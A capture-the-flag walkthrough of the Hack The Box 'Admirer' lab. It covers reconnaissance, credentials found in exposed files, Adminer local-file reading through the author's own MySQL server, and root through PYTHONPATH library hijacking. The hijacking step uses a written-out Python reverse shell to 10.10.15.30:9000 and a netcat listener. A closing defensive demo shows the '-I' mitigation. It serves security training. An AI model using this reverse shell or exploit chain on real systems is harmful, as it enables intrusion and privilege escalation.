Hackthebox – Admirer

As with any box, I start with a port scan.

root@kalivm:~/Admirer# nmap -oN fullscan-A -A 10.10.10.187
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 13:47 CEST
Nmap scan report for 10.10.10.187 (10.10.10.187)
Host is up (0.015s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
|   256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
|_  256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
80/tcp open  http    Apache httpd 2.4.25
|_http-title: Admirer
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=5/29%OT=21%CT=1%CU=32372%PV=Y%DS=2%DC=T%G=Y%TM=5ED24C9
OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=8)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: Host: admirer.htb; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1723/tcp)
HOP RTT      ADDRESS
1   13.98 ms 10.10.14.1 (10.10.14.1)
2   14.46 ms 10.10.10.187 (10.10.10.187)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 102.35 seconds

Not much is open: ftp, ssh and a web server. As the ftp server does not allow anonymous login, I start with the web server.
[Screenshot: admirer main page]
The web page does not show much, and inspecting the source does not disclose anything of interest yet either. So I start running some gobuster and nikto scans against the target to see if there is anything interesting.

root@kalivm:~/Admirer# nikto -host 10.10.10.187 -output admirer-nikto.txt
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.187
+ Target Hostname:    10.10.10.187
+ Target Port:        80
+ Start Time:         2020-05-29 14:08:58 (GMT2)
---------------------------------------------------------------------------
---snip---
+ "robots.txt" contains 1 entry which should be manually viewed.
---snip---

[Screenshot: robots.txt file]
Upon inspection, the robots.txt file shows an admin-dir entry.
[Screenshot: 403 Forbidden error on admin-dir]
Visiting the admin-dir location returns only a 403 Forbidden error. Time to see if there are any files or directories accessible with gobuster.

root@kalivm:~/Admirer# gobuster dir -w /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x .txt,.php,.html -u http://10.10.10.187/admin-dir/ -t 40
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.187/admin-dir/
[+] Threads:        40
[+] Wordlist:       /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt,php,html
[+] Timeout:        10s
===============================================================
2020/05/29 14:12:45 Starting gobuster
===============================================================
/contacts.txt (Status: 200)
/credentials.txt (Status: 200)
===============================================================
2020/05/29 14:16:32 Finished
===============================================================

Credentials and Contacts? This might be interesting.

root@kalivm:~/Admirer# curl http://10.10.10.187/admin-dir/credentials.txt
[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!

Usernames and passwords; perhaps that ftpuser works on the ftp server, but let's first take a look at the contacts file.

root@kalivm:~/Admirer# curl http://10.10.10.187/admin-dir/contacts.txt
##########
# admins #
##########
# Penny
Email: p.wise@admirer.htb


##############
# developers #
##############
# Rajesh
Email: r.nayyar@admirer.htb

# Amy
Email: a.bialik@admirer.htb

# Leonard
Email: l.galecki@admirer.htb



#############
# designers #
#############
# Howard
Email: h.helberg@admirer.htb

# Bernadette
Email: b.rauch@admirer.htb

This file is filled with more potential usernames, so I gather those too and store them.

root@kalivm:~/Admirer# ncftp -u ftpuser 10.10.10.187
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).
Connecting to 10.10.10.187...
(vsFTPd 3.0.3)
Logging in...
Password requested by 10.10.10.187 for user "ftpuser".

    Please specify the password.

Password: *************

Login successful.
Logged in to 10.10.10.187.
ncftp / > ls
dump.sql      html.tar.gz

After downloading both, dump.sql only appears to contain what is required to display the website, nothing more than that.

root@kalivm:~/Admirer# ls html/
assets  images  index.php  robots.txt  utility-scripts  w4ld0s_s3cr3t_d1r

The html.tar.gz file, however, appears to be a backup of the html directory of the web server, which looks interesting.

root@kalivm:~/Admirer# egrep -ir 'username.=|password.=' html/
html/index.php:                        $username = "waldo";
html/index.php:                        $password = "]F7jLHw:*G>UPrTo}~A"d6b";
html/utility-scripts/db_admin.php:  $username = "waldo";
html/utility-scripts/db_admin.php:  $password = "Wh3r3_1s_w4ld0?";

And that gives two more username/password combinations. However, when trying the credentials on other ports such as SSH, the ftpuser account appears to work a little, but gets disconnected immediately after login.

root@kalivm:~/Admirer# gobuster dir -w /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x .txt,.php,.html -u http://10.10.10.187/utility-scripts/ -t 40
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.187/utility-scripts/
[+] Threads:        40
[+] Wordlist:       /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,html,txt
[+] Timeout:        10s
===============================================================
2020/05/29 14:30:37 Starting gobuster
===============================================================
/info.php (Status: 200)
/phptest.php (Status: 200)
/adminer.php (Status: 200)
===============================================================
2020/05/29 14:32:54 Finished
===============================================================

After some additional recon on the utility-scripts directory, and spending some time on the various tools in that directory, I find an adminer.php page by using gobuster again.
[Screenshot: adminer.php page on admirer]
I was not entirely familiar with it, but some research showed that it is another tool in the style of phpMyAdmin, with some interesting functionality and, in the case of this version, a very useful vulnerability.

root@kalivm:~/~# mysql -u root
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 60
Server version: 10.3.22-MariaDB-1 Debian buildd-unstable

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> create database admirer;
Query OK, 1 row affected (0.001 sec)

MariaDB [(none)]> create user 'waldo'@'%' identified by '';
Query OK, 0 rows affected (0.000 sec)

MariaDB [(none)]> grant all privileges on admirer.* to 'waldo'@'%';
Query OK, 0 rows affected (0.001 sec)

MariaDB [(none)]> flush privileges;
Query OK, 0 rows affected (0.001 sec)

So I create a database and the user waldo, setting his password as above. By giving him the username 'waldo'@'%', I ensure that a login is allowed from anywhere, and I give waldo all permissions on the database I created.
[Screenshot: entering the credentials of my own system in Adminer]
Time to see if I can log in using these credentials on my local database.
[Screenshot: login to my own system succeeded]
OK, that worked. Now it is time to see if I can really get local files read into my database. So first I use this interface to create a simple table, and then start playing with some queries.
[Screenshot: /etc/passwd cannot be accessed]
Apparently I am not able to access /etc/passwd. That's a shame, but maybe I can read the index.php file and see if the username/password combination has been changed compared to the downloaded html.tar.gz file.
[Screenshot: index.php could be read]
I can access the file, and it should now be stored in the table; let's check if I can read the data.

MariaDB [admirer]> select * from data;
+----------------------------------------------------------------+
| data                                                           |
+----------------------------------------------------------------+
----snip----
|                         $servername = "localhost"              |;
|                         $username = "waldo";                   |
|                         $password = "&<h5b~yK3F#{PaPB&dA}{H>"; |
|                         $dbname = "admirerdb";                 |
----snip----
+----------------------------------------------------------------+
123 rows in set (0.001 sec)

And there we have yet another username and password combination which I can try.

root@kalivm:~/Admirer# ssh waldo@10.10.10.187
waldo@10.10.10.187's password: 
Linux admirer 4.9.0-12-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sat May 29 14:23:58 2020 from 10.10.15.4
waldo@admirer:~$ cat user.txt 
a80c73<NOFLAG>c1c085ed6890e9f3b6

And there is the user flag for Admirer.

Privilege escalation

After a little browsing around, I found the sudo privileges quite interesting.

waldo@admirer:~$ sudo -l
[sudo] password for waldo:
Matching Defaults entries for waldo on admirer:
    env_reset, env_file=/etc/sudoenv, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin,
    listpw=always

User waldo may run the following commands on admirer:
    (ALL) SETENV: /opt/scripts/admin_tasks.sh

It is possible to run a shell script through sudo while preserving environment variables (SETENV). Let's check out that shell script and see what it calls.

waldo@admirer:~$ cat /opt/scripts/admin_tasks.sh
----snip----
backup_web()
{
    if [ "$EUID" -eq 0 ]
    then
        echo "Running backup script in the background, it might take a while..."
        /opt/scripts/backup.py &
    else
        echo "Insufficient privileges to perform the selected operation."
    fi
}
----snip----

There were various not so interesting things in the script, but what caught my eye was the backup_web function. This function calls backup.py, to which I also don't have write permissions, but as it is yet another script, I decide to check it out.

waldo@admirer:~$ cat /opt/scripts/backup.py 
#!/usr/bin/python3

from shutil import make_archive

src = '/var/www/html/'

# old ftp directory, not used anymore
#dst = '/srv/ftp/html'

dst = '/var/backups/html'

make_archive(dst, 'gztar', src)

This script does, however, import make_archive from shutil and call it to compress the files. This might provide a possibility for library hijacking.

waldo@admirer:/tmp/sedje$ cat shutil.py 
import os,subprocess,socket

def make_archive(a, b, c):
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.30",9000));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"],shell=True);

This actually took me way longer than I would have liked. I had some half-working shells in between, but ultimately found out that it worked much better when adding shell=True to the subprocess call. Nevertheless, I got it working and saved it as shutil.py so that it can be used as the library-hijacking file.

waldo@admirer:/tmp/sedje$ sudo -E PYTHONPATH=/tmp/sedje /opt/scripts/admin_tasks.sh 6
Running backup script in the background, it might take a while...
waldo@admirer:/tmp/sedje$ /var/backups/html gztar /var/www/html/

I run the script with PYTHONPATH set to the location of my shutil.py, so that the reverse shell gets included, while my listener is running.

root@kalivm:~/Admirer# rlwrap nc -lvp 9000
Listening on 0.0.0.0 9000
Connection received on 10.10.10.187 48172
id
uid=0(root) gid=0(root) groups=0(root)

There is my root shell; now all that is left is to get the flag!
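To make the root cause of this escalation concrete, here is an added example (my own code, not from the writeup or the box) that plants a harmless decoy shutil.py in a temporary directory, shows that a child interpreter picks it up through PYTHONPATH ahead of the standard library, and shows that running the interpreter in isolated mode (-I) ignores PYTHONPATH and so closes this path; on the sudoers side the same result follows from dropping SETENV, since env_reset then strips PYTHONPATH before the script runs.

```python
import os
import subprocess
import sys
import tempfile
import textwrap

# Constructed decoy module (not the writeup's reverse shell): a stand-in shutil.py
# that only records that it was imported in place of the standard library module.
DECOY_SHUTIL = textwrap.dedent("""
    HIJACKED = True

    def make_archive(base_name, fmt, root_dir=None, **kwargs):
        return "decoy make_archive called"
""")

# Probe run in a child interpreter: which shutil did 'import shutil' resolve to?
PROBE = "import shutil; print(getattr(shutil, 'HIJACKED', False))"


def shutil_is_hijacked(pythonpath_dir, isolated):
    """Run a child python with PYTHONPATH=pythonpath_dir and report whether
    'import shutil' resolved to the decoy (True) or to the stdlib (False).
    With isolated=True the child gets -I, which ignores PYTHONPATH entirely."""
    env = dict(os.environ, PYTHONPATH=pythonpath_dir)
    cmd = [sys.executable] + (["-I"] if isolated else []) + ["-c", PROBE]
    result = subprocess.run(cmd, env=env, capture_output=True, text=True, check=True)
    return result.stdout.strip() == "True"


def demo():
    """Plant the decoy in a temp dir and compare a normal run with an isolated one.
    Returns (hijacked_without_I, hijacked_with_I)."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "shutil.py"), "w") as fh:
            fh.write(DECOY_SHUTIL)
        return (shutil_is_hijacked(tmp, isolated=False),
                shutil_is_hijacked(tmp, isolated=True))


if __name__ == "__main__":
    plain, isolated = demo()
    print(f"without -I: shutil hijacked = {plain}")
    print(f"with    -I: shutil hijacked = {isolated}")
```

The same check, reading shutil.__file__ inside the privileged script, is a cheap way to spot a hijacked standard-library module at runtime.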

cat /root/root.txt
9016417<NOFLAG>beb4ffb7ef392d448
